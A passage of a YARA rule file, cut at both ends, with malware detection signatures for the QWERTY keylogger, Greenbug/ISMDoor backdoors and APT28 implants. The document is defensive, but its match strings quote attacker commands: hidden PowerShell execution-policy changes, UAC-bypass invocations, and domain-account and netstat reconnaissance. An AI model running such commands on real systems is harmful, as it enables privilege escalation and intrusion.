    description = "FiveEyes QUERTY Malware - file 20123_cmdDef.xml"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "7b08fc77629f6caaf8cc4bb5f91be6b53e19a3cd"
  strings:
    $s0 = "<shortDescription>Keystroke Collector</shortDescription>" ascii fullword
    $s1 = "This plugin is the E_Qwerty Kernel Mode driver for logging keys.</description>" ascii fullword
    $s2 = "<commands/>" ascii fullword
    $s3 = "</version>" ascii fullword
    $s4 = "<associatedImplantId>20121</associatedImplantId>" ascii fullword
    $s5 = "<rightsRequired>System or Administrator (if Administrator, I think the DriverIns" ascii
    $s6 = "<platforms>Windows NT, Windows 2000, Windows XP (32/64 bit), Windows 2003 (32/64" ascii
    $s7 = "<projectpath>plugin/Collection</projectpath>" ascii fullword
    $s8 = "<dllDepend>None</dllDepend>" ascii fullword
    $s9 = "<minorType>0</minorType>" ascii fullword
    $s10 = "<pluginname>E_QwertyKM</pluginname>" ascii fullword
    $s11 = "</comments>" ascii fullword
    $s12 = "<comments>" ascii fullword
    $s13 = "<majorType>1</majorType>" ascii fullword
    $s14 = "<files>None</files>" ascii fullword
    $s15 = "<poc>Erebus</poc>" ascii fullword
    $s16 = "</plugin>" ascii fullword
    $s17 = "<team>None</team>" ascii fullword
    $s18 = "<?xml-stylesheet type=\"text/xsl\" href=\"../XSLT/pluginHTML.xsl\"?>" ascii fullword
    $s19 = "<pluginsDepend>U_HookManager v1.0, Kernel Covert Store v1.0</pluginsDepend>" ascii fullword
    $s20 = "<plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi" ascii
  condition:
    14 of them
}

rule FiveEyes_QUERTY_Malwaresig_20121_dll {
  meta:
    description = "FiveEyes QUERTY Malware - file 20121.dll.bin"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "89504d91c5539a366e153894c1bc17277116342b"
  strings:
    $s0 = "WarriorPride\\production2.0\\package\\E_Wzowski" ascii
    $s1 = "20121.dll" ascii fullword
  condition:
    all of them
}

rule FiveEyes_QUERTY_Malwareqwerty_20123 {
  meta:
    description = "FiveEyes QUERTY Malware - file 20123.xml"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "edc7228b2e27df9e7ff9286bddbf4e46adb51ed9"
  strings:
    $s0 = "<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by TEAM (RENEGADE) -" ascii
    $s1 = "<configFileName>20123_cmdDef.xml</configFileName>" ascii fullword
    $s2 = "<name>20123.sys</name>" ascii fullword
    $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
    $s4 = "<codebase>/bin/i686-pc-win32/debug</codebase>" ascii fullword
    $s5 = "<platform type=\"1\">" ascii fullword
    $s6 = "</plugin>" ascii fullword
    $s7 = "</pluginConfig>" ascii fullword
    $s8 = "<pluginConfig>" ascii fullword
    $s9 = "</platform>" ascii fullword
    $s10 = "</lpConfig>" ascii fullword
    $s11 = "<lpConfig>" ascii fullword
  condition:
    9 of them
}

rule FiveEyes_QUERTY_Malwaresig_20120_dll {
  meta:
    description = "FiveEyes QUERTY Malware - file 20120.dll.bin"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "6811bfa3b8cda5147440918f83c40237183dbd25"
  strings:
    $s0 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.txt" wide fullword
    $s1 = "\\QwLog_%d-%02d-%02d-%02d%02d%02d.xml" wide fullword
    $s2 = "Failed to send the EQwerty_driverStatusCommand to the implant." ascii fullword
    $s3 = "- Log Used (number of windows) - %d" wide fullword
    $s4 = "- Log Limit (number of windows) - %d" wide fullword
    $s5 = "Process or User Default Language" wide fullword
    $s6 = "Windows 98/Me, Windows NT 4.0 and later: Vietnamese" wide fullword
    $s7 = "- Logging of keystrokes is switched ON" wide fullword
    $s8 = "- Logging of keystrokes is switched OFF" wide fullword
    $s9 = "Qwerty is currently logging active windows with titles containing the fo" wide
    $s10 = "Windows 95, Windows NT 4.0 only: Korean (Johab)" wide fullword
    $s11 = "FAILED to get Qwerty Status" wide fullword
    $s12 = "- Successfully retrieved Log from Implant." wide fullword
    $s13 = "- Logging of all Windows is toggled ON" wide fullword
    $s14 = "- Logging of all Windows is toggled OFF" wide fullword
    $s15 = "Qwerty FAILED to retrieve window list." wide fullword
    $s16 = "- UNSUCCESSFUL Log Retrieval from Implant." wide fullword
    $s17 = "The implant failed to return a valid status" ascii fullword
    $s18 = "- Log files were NOT generated!" wide fullword
    $s19 = "Windows 2000/XP: Armenian. This is Unicode only." wide fullword
    $s20 = "- This machine is using a PS/2 Keyboard - Continue on using QWERTY" wide fullword
  condition:
    10 of them
}

rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
  meta:
    description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
  strings:
    $s0 = "This PPC gets the current keystroke log." ascii fullword
    $s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
    $s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
    $s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
    $s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
    $s5 = "<definition>Turn logging of all keys on|off</definition>" ascii fullword
    $s6 = "<name>Get Keystroke Log</name>" ascii fullword
    $s7 = "<description>Keystroke Logger Lp Plugin</description>" ascii fullword
    $s8 = "<definition>display help for this function</definition>" ascii fullword
    $s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
    $s10 = "Set the log limit (in number of windows)" ascii fullword
    $s11 = "<example>qwgetlog</example>" ascii fullword
    $s12 = "<aliasName>qwgetlog</aliasName>" ascii fullword
    $s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
    $s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" ascii fullword
    $s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
    $s16 = "<command id=\"32\">" ascii fullword
    $s17 = "<command id=\"3\">" ascii fullword
    $s18 = "<command id=\"7\">" ascii fullword
    $s19 = "<command id=\"1\">" ascii fullword
    $s20 = "<command id=\"4\">" ascii fullword
  condition:
    10 of them
}

rule FiveEyes_QUERTY_Malwareqwerty_20120 {
  meta:
    description = "FiveEyes QUERTY Malware - file 20120.xml"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "597082f05bfd3225587d480c30f54a7a1326a892"
  strings:
    $s0 = "<configFileName>20120_cmdDef.xml</configFileName>" ascii fullword
    $s1 = "<name>20120.dll</name>" ascii fullword
    $s2 = "<codebase>\"Reserved for future use.\"</codebase>" ascii fullword
    $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
    $s4 = "<platform type=\"1\">" ascii fullword
    $s5 = "</plugin>" ascii fullword
    $s6 = "</pluginConfig>" ascii fullword
    $s7 = "<pluginConfig>" ascii fullword
    $s8 = "</platform>" ascii fullword
    $s9 = "</lpConfig>" ascii fullword
    $s10 = "<lpConfig>" ascii fullword
  condition:
    all of them
}

rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
  meta:
    description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
    author = "Florian Roth"
    reference = "http://www.spiegel.de/media/media-35668.pdf"
    date = "2015/01/18"
    hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
  strings:
    $s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" ascii fullword
    $s1 = "<message>Failed to get File Time</message>" ascii fullword
    $s2 = "<description>Keystroke Logger Plugin.</description>" ascii fullword
    $s3 = "<message>Failed to set File Time</message>" ascii fullword
    $s4 = "</commands>" ascii fullword
    $s5 = "<commands>" ascii fullword
    $s6 = "</version>" ascii fullword
    $s7 = "<associatedImplantId>20120</associatedImplantId>" ascii fullword
    $s8 = "<message>No Comms. with Driver</message>" ascii fullword
    $s9 = "</error>" ascii fullword
    $s10 = "<message>Invalid File Size</message>" ascii fullword
    $s11 = "<platforms>Windows (User/Win32)</platforms>" ascii fullword
    $s12 = "<message>File Size Mismatch</message>" ascii fullword
    $s13 = "<projectpath>plugin/Utility</projectpath>" ascii fullword
    $s14 = "<pluginsDepend>None</pluginsDepend>" ascii fullword
    $s15 = "<dllDepend>None</dllDepend>" ascii fullword
    $s16 = "<pluginname>E_QwertyIM</pluginname>" ascii fullword
    $s17 = "<rightsRequired>None</rightsRequired>" ascii fullword
    $s18 = "<minorType>0</minorType>" ascii fullword
    $s19 = "<code>00001002</code>" ascii fullword
    $s20 = "<code>00001001</code>" ascii fullword
  condition:
    12 of them
}

rule Control32 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "b3dc808fc7cb4492669ec019911ef22a"
}

rule Control64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "bec30379078d5c5c7845d3be33707b89"
}

rule GH_PM32 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "2f2c5b3f3b1f97908074f526ac90a28d"
}

rule GH_PM64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "fe6c0097412b2c7b7f4b8a489004dd14"
}

rule MemStub32_GH1 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "0a579ad25fdd4db8110aac4dbb7d2da3"
}

rule MemStub32 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "8987652f26732607b769247adb4e9cce"
}

rule MemStub64_GH1 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "2350403a09e6928f0a7ba5d74da58cb9"
}

rule MemStub64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "6b5b46d3212fc3fc5b455d9efd8d3ffa"
}

rule msvcrt_Win7AMD64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "c8fc794cc5a22b5a1e0803b0b8acce77"
}

rule msvcrt_Win7x86 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "7713e5c5a48b020c9575b1b50f2e5e9e"
}

rule msvcrt_WIN8AMD64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "33c59fcdf027470e0ab1d366f54a6ebf"
}

rule msvcrt_WIN8x86 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "95490c2b284a9bb63f0ee49254ab727e"
}

rule msvcrt_WinXPx86 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "b68f72d77754f8b76168ced0924a4174"
}

rule Network_Win7AMD64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "eb92031a38f17d0e63285b5142b31966"
}

rule Network_Win7x86 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "548889baed7768b828d9c2f373abd225"
}

rule Network_WinXPx86 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "877341a16d5d223435c43a9db7f721bc"
}

rule RabbitStew32 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "a9d2e8ae5ddbf8f2842d96f7de2faef8"
}

rule RabbitStew64 {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "fa415b6280104e813770df520b303897"
}

rule Vbr {
  meta:
    author = "Jaume Martin"
  condition:
    hash.md5(0, filesize) == "961d2fd68fde2ae0b7c52e0c90767d0d"
}

rule Greenbug_Malware_1 {
  meta:
    description = "Detects Malware from Greenbug Incident"
    author = "Florian Roth"
    reference = "https://goo.gl/urp4CD"
    date = "2017-01-25"
    hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
  strings:
    $s1 = "vailablez" ascii fullword
    $s2 = "Sfouglr" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and all of them)
}

rule Greenbug_Malware_2 {
  meta:
    description = "Detects Backdoor from Greenbug Incident"
    author = "Florian Roth"
    reference = "https://goo.gl/urp4CD"
    date = "2017-01-25"
    hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
    hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
    hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
  strings:
    $x1 = "|||Command executed successfully" ascii fullword
    $x2 = "\\Release\\Bot Fresh.pdb" ascii
    $x3 = "C:\\ddd\\a1.txt" wide fullword
    $x4 = "Bots\\Bot5\\x64\\Release" ascii
    $x5 = "Bot5\\Release\\Ism.pdb" ascii
    $x6 = "Bot\\Release\\Ism.pdb" ascii
    $x7 = "\\Bot Fresh\\Release\\Bot" ascii
    $s1 = "/Home/SaveFile?commandId=CmdResult=" wide fullword
    $s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" ascii fullword
    $s3 = "Set-Cookie:\\b*{.+?}\\n" wide fullword
    $s4 = "SELECT * FROM AntiVirusProduct" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and (1 of ($x*) or 2 of them)) or (3 of them)
}

rule Greenbug_Malware_3 {
  meta:
    description = "Detects Backdoor from Greenbug Incident"
    author = "Florian Roth"
    reference = "https://goo.gl/urp4CD"
    date = "2017-01-25"
    super_rule = 1
    hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
    hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
  strings:
    $x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" ascii fullword
    $x2 = "C:\\ddd\\wer2.txt" wide fullword
    $x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" wide fullword
  condition:
    1 of them
}

rule Greenbug_Malware_4 {
  meta:
    description = "Detects ISMDoor Backdoor"
    author = "Florian Roth"
    reference = "https://goo.gl/urp4CD"
    date = "2017-01-25"
    super_rule = 1
    hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
    hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
  strings:
    $s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" ascii fullword
    $s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" ascii fullword
    $s3 = "c:\\windows\\temp\\tmp8873" ascii fullword
    $s4 = "taskkill /im winit.exe /f" ascii fullword
    $s5 = "invoke-psuacme"
    $s6 = "-method oobe -payload \"\"" ascii fullword
    $s7 = "C:\\ProgramData\\stat2.dat" wide fullword
    $s8 = "Invoke-bypassuac" ascii fullword
    $s9 = "Start Keylog Done" wide fullword
    $s10 = "Microsoft\\Windows\\WinIt.exe" ascii fullword
    $s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" ascii fullword
    $s12 = "Microsoft\\Windows\\tmp43hh11.txt" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 2048000 and 1 of them) or (3 of them)
}

rule Greenbug_Malware_5 {
  meta:
    description = "Auto-generated rule - from files 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f, 44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49, 7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c, 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
    author = "Florian Roth"
    reference = "https://goo.gl/urp4CD"
    date = "2017-01-25"
    super_rule = 1
    hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
    hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
    hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
    hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
  strings:
    $x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" ascii fullword
    $x2 = "cmd /a /c net user administrator /domain >>" ascii fullword
    $x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" ascii fullword
    $o1 = "========================== (Net User) ==========================" ascii fullword
  condition:
    filesize < 2048000 and ((uint16(0) == 23117 and 1 of them) or $o1)
}

rule IMPLANT_1_v1 {
  meta:
    description = "Downrage Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0 EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_1_v2 {
  meta:
    description = "Downrage Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00 00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 }
    $STR2 = { 55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81 80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 }
  condition:
    (uint16(0) == 23117) and any of them
}

rule IMPLANT_1_v3 {
  meta:
    description = "Downrage Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_1_v4 {
  meta:
    description = "Downrage Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ?? ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_1_v5 {
  meta:
    description = "Downrage Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77 [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 }
    $mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C 36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and any of them
}

rule IMPLANT_1_v7 {
  meta:
    description = "Downrage Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v1 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8D ?? FA [2] E8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6A 00 6A 01 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v2 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 83 ?? 06 [7-17] FA [0-10] 45 [2-4] 48 [2-4] E8 [2] FF FF [6-8] 48 8D [3] 48 89 [3] 45 [2] 4? [1-2] 01 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v3 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { C1 EB 07 8D ?? 01 32 1C ?? 33 D2 }
    $STR2 = { 2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 }
    $STR3 = { 89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D ?? ?? 8D ?? ?? FE }
  condition:
    (uint16(0) == 23117) and any of them
}

rule IMPLANT_2_v4 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 55 8B EC 6A FE 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6A 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v5 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 48 83 [2] 48 89 [3] C7 44 [6] 4C 8D 05 [3] 00 BA 01 00 00 00 33 C9 FF 15 [2] 00 00 FF 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v6 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { E8 [2] FF FF 8B [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v7 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $s1 = { 10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13 21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0 25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21 C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B }
    $s2 = { 28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD 88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90 60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5? ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 }
  condition:
    (uint16(0) == 23117) and any of them
}

rule IMPLANT_2_v8 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89 74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D 04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76 4C 89 6C 24 }
    $STR2 = { C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D 04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 }
    $STR3 = { 41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04 1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA }
    $STR4 = { 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03 C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 }
  condition:
    (uint16(0) == 23117) and any of them
}

rule IMPLANT_2_v9 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89 45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6 8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE 3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8 0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33 C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02 C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F 02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01 FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33 D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45 E4 30 1C 01 8B 4D 0C }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_2_v10 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 83 ?? 06 [7-17] FA [0-10] 45 [2-4] 48 [2-4] E8 [2] FF FF [6-8] 48 8D [3] 48 89 [3] 45 [2] 4? [1-2] 01 }
  condition:
    (uint16(0) == 23117) and all of them
}

rule IMPLANT_2_v11 {
  meta:
    description = "CORESHELL/SOURFACE Implant by APT28"
    author = "US CERT"
